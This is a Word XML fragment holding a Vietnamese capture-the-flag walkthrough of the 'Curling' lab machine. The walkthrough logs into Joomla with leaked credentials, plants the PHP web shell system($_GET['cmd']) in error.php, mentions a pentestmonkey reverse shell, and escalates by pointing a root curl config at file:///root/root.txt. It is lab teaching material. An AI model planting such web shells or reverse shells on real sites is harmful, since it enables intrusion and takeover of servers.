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126D0E" w14:textId="293A9149" w:rsidR="002F49FE" w:rsidRDefault="00B06447">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16384167" wp14:editId="0A66EA63">
            <wp:extent cx="5943600" cy="207200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2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ACA0" w14:textId="3D749805" w:rsidR="00B06447" w:rsidRDefault="00B06447">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF8D2DB" w14:textId="122CD3FB" w:rsidR="00C258ED" w:rsidRPr="00C258ED" w:rsidRDefault="00C258E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Trong source code của trang web, mình tìm được tập tin secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEC6B53" w14:textId="5CCD0F1C" w:rsidR="00B06447" w:rsidRDefault="00C258ED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CCDEF64" wp14:editId="720B7AD8">
            <wp:extent cx="1955800" cy="3683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55800" cy="368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99796" w14:textId="6DC93D57" w:rsidR="00C258ED" w:rsidRDefault="00C258ED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C43295E" w14:textId="55F1155C" w:rsidR="00C258ED" w:rsidRDefault="00DF5565">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="746C4DA5" wp14:editId="5EDD6B4C">
            <wp:extent cx="5880100" cy="12700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801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9AE8E" w14:textId="668A44B1" w:rsidR="009075C5" w:rsidRPr="009075C5" w:rsidRDefault="009075C5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009075C5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Giải mã Base64: </w:t>
      </w:r>
      <w:r w:rsidRPr="009075C5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Curling2018!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB1C4F2" w14:textId="77777777" w:rsidR="007E637F" w:rsidRDefault="007E637F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71FC4E84" w14:textId="4220ABB8" w:rsidR="007E637F" w:rsidRPr="00415905" w:rsidRDefault="00D80DEC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00415905">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>floris</w:t>
      </w:r>
      <w:r w:rsidR="007E637F" w:rsidRPr="00415905">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="007E637F" w:rsidRPr="00415905">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Curling2018!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A689A84" w14:textId="19FCB0A4" w:rsidR="007E637F" w:rsidRDefault="007E637F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1152A1" w14:textId="2C9F63CA" w:rsidR="007E637F" w:rsidRDefault="007E637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Đăng nhập trang web, floris là Super User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C40A61" w14:textId="70CF2ECF" w:rsidR="007E637F" w:rsidRDefault="007E637F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5743B9E7" w14:textId="31B4748C" w:rsidR="007E637F" w:rsidRDefault="00214A55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39AE938C" wp14:editId="3F17F983">
            <wp:extent cx="5041631" cy="3270738"/>
            <wp:effectExtent l="0" t="0" r="635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5976" t="15466" r="10443" b="8160"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5074559" cy="3292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E7DBEC" w14:textId="43ECEE5C" w:rsidR="00415905" w:rsidRDefault="00415905">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7381228D" w14:textId="50BFA65C" w:rsidR="00415905" w:rsidRDefault="0041590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Đăng nhập ở trang chủ không có gì để khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DDB365" w14:textId="6F591C70" w:rsidR="00214A55" w:rsidRDefault="00214A55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A4DC63" w14:textId="6CB21F8A" w:rsidR="00D8081D" w:rsidRDefault="00D8081D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Phiên bản của Joomla là 3.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F870091" w14:textId="4768F220" w:rsidR="00214A55" w:rsidRDefault="007776AC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B793654" wp14:editId="79B59D85">
            <wp:extent cx="5080000" cy="12700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0000" cy="127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1D8460" w14:textId="0870DA90" w:rsidR="007776AC" w:rsidRDefault="007776AC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40EED058" w14:textId="33A21AB7" w:rsidR="00D8081D" w:rsidRDefault="00F4771A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Mình tiếp tục đăng nhập t</w:t>
      </w:r>
      <w:r w:rsidR="00D8081D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rang administrator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F00DE9" w14:textId="635E03C4" w:rsidR="00D8081D" w:rsidRDefault="00D8081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69EAC8F7" wp14:editId="1972A20D">
            <wp:extent cx="4220308" cy="2768619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274" t="15465" r="21100" b="26148"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4268994" cy="280055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C36912" w14:textId="53A12514" w:rsidR="00415905" w:rsidRDefault="00415905">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="681842C2" w14:textId="1BF77F7F" w:rsidR="00F4771A" w:rsidRPr="00F4771A" w:rsidRDefault="00F4771A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4771A">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>floris : Curling2018!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F00CAFB" w14:textId="77777777" w:rsidR="00F4771A" w:rsidRDefault="00F4771A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D93CB5C" w14:textId="349B1A2E" w:rsidR="00415905" w:rsidRDefault="00BA1B7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086BA4E8" wp14:editId="6C312666">
            <wp:extent cx="5709138" cy="3252644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666" t="15779" r="2722" b="4357"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5721726" cy="32598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482BC1" w14:textId="14C36B2D" w:rsidR="00BA1B7F" w:rsidRDefault="00BA1B7F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27F34B95" w14:textId="12AFF2A3" w:rsidR="00BA1B7F" w:rsidRDefault="001D1F63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Vào Templates</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1F63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protostar</w:t>
      </w:r>
      <w:r w:rsidR="000A441F" w:rsidRPr="000A441F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="000A441F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chọn trang error.php, chúng ta sẽ thêm code php để thực thi lệnh từ xa: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FC24B2" w14:textId="1E186D19" w:rsidR="000A441F" w:rsidRDefault="000A441F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A1E26E9" w14:textId="5AA7B4F5" w:rsidR="000A441F" w:rsidRPr="000A441F" w:rsidRDefault="000A441F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A441F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system($_GET['cmd']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159436D9" w14:textId="77777777" w:rsidR="00415905" w:rsidRDefault="00415905">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CE978EC" w14:textId="53AB71B4" w:rsidR="00D8081D" w:rsidRDefault="009B0D47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4459EF21" wp14:editId="71292CE0">
            <wp:extent cx="5943600" cy="111823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807E1A" w14:textId="3B8B65D7" w:rsidR="009B0D47" w:rsidRDefault="009D1E8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D1E8E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Khai thác thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCEC2DE" w14:textId="3016AFB7" w:rsidR="009D1E8E" w:rsidRDefault="009D1E8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49B0EBC6" w14:textId="32E5ACAD" w:rsidR="00520EAE" w:rsidRDefault="00520EAE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Chúng ta sẽ chỉnh sửa error.php thành php reverse shell của pentest monkey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1574E5C1" w14:textId="77777777" w:rsidR="00520EAE" w:rsidRDefault="00520EAE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C08D47C" w14:textId="53703807" w:rsidR="007776AC" w:rsidRDefault="006C5932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7814245" wp14:editId="4896921D">
            <wp:extent cx="5943600" cy="1748155"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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4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2480D" w14:textId="2532D698" w:rsidR="006C5932" w:rsidRDefault="006C5932">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A5F3DB7" w14:textId="65605A51" w:rsidR="006C5932" w:rsidRDefault="0002633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B6F5311" wp14:editId="42DAF7C7">
            <wp:extent cx="5943600" cy="301307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3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5CB23" w14:textId="0DFEE545" w:rsidR="00026338" w:rsidRDefault="00026338">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06AE3C98" w14:textId="587F51FC" w:rsidR="00026338" w:rsidRDefault="0002633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Chúng ta phải lấy được mật khẩu của floris!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27791DF2" w14:textId="6C7E87E1" w:rsidR="00026338" w:rsidRDefault="00026338">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D2FC111" w14:textId="351C1413" w:rsidR="00026338" w:rsidRDefault="00CF62DA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288D7010" wp14:editId="66F3E16E">
            <wp:extent cx="5943600" cy="320484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AF1F3" w14:textId="1D60B0F9" w:rsidR="00CF62DA" w:rsidRDefault="00CF62DA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2172150E" w14:textId="0C22164D" w:rsidR="00CF62DA" w:rsidRDefault="00B81695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Tập tin giống hex dump nên mình dùng xxd để dịch ngược:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BE3768" w14:textId="2660436F" w:rsidR="00B81695" w:rsidRDefault="00B81695">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5607CB12" w14:textId="17DC7D53" w:rsidR="00B81695" w:rsidRDefault="00142FF1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705D44B" wp14:editId="226856F3">
            <wp:extent cx="5943600" cy="187261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7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C092DA" w14:textId="15542AC8" w:rsidR="00142FF1" w:rsidRDefault="00142FF1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F9EA3C" w14:textId="39123CD8" w:rsidR="00665E65" w:rsidRPr="00665E65" w:rsidRDefault="00665E65">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00665E65">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bzip2 -d bak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB4EB96" w14:textId="77777777" w:rsidR="00665E65" w:rsidRDefault="00665E65">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C92935" w14:textId="36BE870D" w:rsidR="00142FF1" w:rsidRDefault="00773466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11EBB406" wp14:editId="34B05053">
            <wp:extent cx="5943600" cy="136207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62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4FC1FB" w14:textId="7CD1A63A" w:rsidR="00665E65" w:rsidRDefault="00665E65">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="641C7E14" w14:textId="341DACBE" w:rsidR="00AF3287" w:rsidRDefault="00AF3287">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7178C8F1" w14:textId="007A2770" w:rsidR="00AF3287" w:rsidRDefault="00AF3287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Sau một lúc giải mã, mình tìm được mật khẩu của floris:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7503FE" w14:textId="77777777" w:rsidR="00AF3287" w:rsidRDefault="00AF3287">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="335CFD03" w14:textId="694796E7" w:rsidR="00AF3287" w:rsidRPr="00AF3287" w:rsidRDefault="00AF3287">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF3287">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">floris : </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF3287">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5d&lt;wdCbdZu)|hChXll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE86BC4" w14:textId="4E7B22FB" w:rsidR="00773466" w:rsidRDefault="00773466">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F9DCDC" w14:textId="2476719F" w:rsidR="00773466" w:rsidRDefault="0092172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0C70AE0" wp14:editId="2837EBDA">
            <wp:extent cx="5943600" cy="433451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33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F1B56E" w14:textId="77777777" w:rsidR="00087A00" w:rsidRDefault="00087A00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A1E6895" w14:textId="35327ECD" w:rsidR="00921728" w:rsidRDefault="00087A0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AF25F3E" wp14:editId="676B8FBF">
            <wp:extent cx="3352800" cy="4191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52800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54A4" w14:textId="77777777" w:rsidR="000C2AED" w:rsidRDefault="000C2AED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA1D67D" w14:textId="2F37663F" w:rsidR="00921728" w:rsidRDefault="000C2AED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4A85294E" wp14:editId="290E9358">
            <wp:extent cx="3225800" cy="43180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5A391A" w14:textId="3DC411AA" w:rsidR="00EA5720" w:rsidRDefault="00EA5720">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25E68EFC" w14:textId="7F826174" w:rsidR="00EA5720" w:rsidRDefault="00EA5720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8B6E502" wp14:editId="4B7C6D85">
            <wp:extent cx="3937000" cy="4572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3700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E18CB0" w14:textId="01CAF312" w:rsidR="00EA5720" w:rsidRDefault="00EA5720">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61DBB482" w14:textId="6477D817" w:rsidR="00EA5720" w:rsidRDefault="00EA5720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Tập tin report là source code của trang web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A9DA39" w14:textId="63259DD0" w:rsidR="00EA5720" w:rsidRDefault="00EA5720">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DEF9330" w14:textId="6AEE9052" w:rsidR="002A325F" w:rsidRDefault="002A325F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62BE658D" w14:textId="0EBEA4D9" w:rsidR="004C3878" w:rsidRDefault="002A325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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EFAB67D" wp14:editId="2C546E1D">
            <wp:extent cx="5943600" cy="447675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7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78AF35" w14:textId="21F0C617" w:rsidR="004C3878" w:rsidRDefault="004C3878">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CEC1807" w14:textId="1B5A7064" w:rsidR="004C3878" w:rsidRDefault="004C3878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Vận chuyển pspy64 đến máy nạn nhân:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B89DB2" w14:textId="26261EAA" w:rsidR="004C3878" w:rsidRDefault="00CA1934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C089F36" wp14:editId="65DE8F23">
            <wp:extent cx="5943600" cy="685165"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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5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31748" w14:textId="1D50EF7D" w:rsidR="00CA1934" w:rsidRDefault="00CA1934">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355F7528" w14:textId="44F716C9" w:rsidR="004C3878" w:rsidRPr="009E6518" w:rsidRDefault="009E6518">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E6518">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56320000" w14:textId="00A2560B" w:rsidR="009E6518" w:rsidRDefault="009E6518">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ECB8749" w14:textId="44E1F6CD" w:rsidR="004F10EF" w:rsidRDefault="004F10EF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F10EF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bạn có thể thấy root (uid=0) đang chạy lệnh curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên tệp cấu hình input rồi ghi vào report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A22902" w14:textId="138544B5" w:rsidR="004C3878" w:rsidRDefault="009E6518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789F35C7" wp14:editId="18C9DF39">
            <wp:extent cx="5943600" cy="644769"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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8285" cy="6507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A993AA" w14:textId="5692DEA3" w:rsidR="009E6518" w:rsidRDefault="009E6518">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F3CAD4" w14:textId="1BB91B4F" w:rsidR="004F10EF" w:rsidRDefault="004F10EF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27595595" w14:textId="6075FC52" w:rsidR="004F10EF" w:rsidRPr="004F10EF" w:rsidRDefault="004F10EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F10EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cách khai thác 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFE648E" w14:textId="77777777" w:rsidR="004F10EF" w:rsidRDefault="004F10EF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F8C9A79" w14:textId="6964A7A0" w:rsidR="004F10EF" w:rsidRDefault="004F10E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Chỉnh sửa tập tin cấu hình thành file:///root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557F91B2" w14:textId="2BC5F76E" w:rsidR="004F10EF" w:rsidRDefault="004F10EF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Đọc flag trong report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B21272" w14:textId="1E7A974D" w:rsidR="004F10EF" w:rsidRDefault="004F10EF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="600B306C" w14:textId="12C06C0F" w:rsidR="004F10EF" w:rsidRDefault="004F10E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E93AD88" wp14:editId="1F7CD33C">
            <wp:extent cx="4013200" cy="43180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132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24F5" w14:textId="57909601" w:rsidR="004F10EF" w:rsidRDefault="004F10EF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D7785B" w14:textId="67D2FEE5" w:rsidR="004F10EF" w:rsidRDefault="004F10EF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31B99872" wp14:editId="5AC8E3AB">
            <wp:extent cx="4051300" cy="4318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51300" cy="43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986FD" w14:textId="3C1A4D58" w:rsidR="004F10EF" w:rsidRDefault="004F10EF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58160CFF" w14:textId="70170293" w:rsidR="004F10EF" w:rsidRPr="00C805EB" w:rsidRDefault="00F41440">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C805EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
